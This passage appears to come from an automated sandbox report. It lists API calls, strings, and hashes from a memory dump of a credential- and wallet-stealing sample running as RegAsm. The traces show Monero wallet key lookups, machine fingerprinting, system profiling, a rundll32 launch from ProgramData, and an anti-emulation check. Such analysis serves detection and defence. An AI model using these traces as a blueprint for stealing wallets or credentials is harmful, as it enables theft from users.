                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                      • DeleteFileA.KERNEL32(?), ref: 00401C9D
                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Filelstrcpy$lstrcat$AllocCreateHeaplstrlen$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                      • String ID: .keys$\Monero\wallet.keys
                                                                                      • API String ID: 2771091047-3586502688
                                                                                      • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                      • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                      • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                      • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                      APIs
                                                                                      • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                      • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                      • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                        • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                        • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                        • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                        • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                        • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                        • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                        • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                      • String ID: LzA
                                                                                      • API String ID: 1968765330-1388989900
                                                                                      • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                      • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                      • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                      • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                      APIs
                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                      • _memset.LIBCMT ref: 0040FBC1
                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                        • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: OpenProcess_memmove_memset
                                                                                      • String ID: N0ZWFt
                                                                                      • API String ID: 2647191932-431618156
                                                                                      • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                      • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                      • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                      • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                      • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                      • String ID: V@
                                                                                      • API String ID: 2311089104-383300688
                                                                                      • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                      • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                      • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                      • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 00411607
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                      • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                      • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CharOpenQueryValue_memset
                                                                                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                      • API String ID: 2355623204-1211650757
                                                                                      • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                      • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                                      • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                      • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                      • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                      • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                      Strings
                                                                                      • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                      • wallet_path, xrefs: 00401A9C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocOpenProcessQueryValue
                                                                                      • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                      • API String ID: 3676486918-4244082812
                                                                                      • Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                      • Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
                                                                                      • Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                      • Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24
                                                                                      APIs
                                                                                      • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                      • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                      • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                      • _wtoi64.MSVCRT ref: 004117C1
                                                                                      • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                      • String ID:
                                                                                      • API String ID: 181426013-0
                                                                                      • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                      • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                      • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                      • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                      • _memset.LIBCMT ref: 004010D0
                                                                                      • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                      • ExitProcess.KERNEL32 ref: 00401112
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                      • String ID:
                                                                                      • API String ID: 1859398019-0
                                                                                      • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                      • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                                      • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                      • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                      • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                      • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                      • API String ID: 2215929589-2108736111
                                                                                      • Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                      • Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
                                                                                      • Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                      • Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 004116CE
                                                                                        • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                        • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                      • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                      • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                      • String ID: Unknown
                                                                                      • API String ID: 2781187439-1654365787
                                                                                      • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                      • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                                      • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                      • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                      • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                      • wsprintfA.USER32 ref: 0041117A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
